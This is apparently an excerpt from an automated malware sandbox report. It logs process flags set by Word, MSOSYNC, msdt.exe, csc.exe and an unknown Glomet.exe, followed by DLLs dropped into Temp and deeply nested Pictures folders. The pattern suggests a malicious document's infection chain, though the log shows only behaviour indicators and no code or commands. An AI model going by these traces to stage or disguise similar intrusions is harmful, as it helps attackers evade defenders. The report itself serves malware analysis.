Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Glomet.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Glomet.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Glomet.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\Glomet.exe Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.dll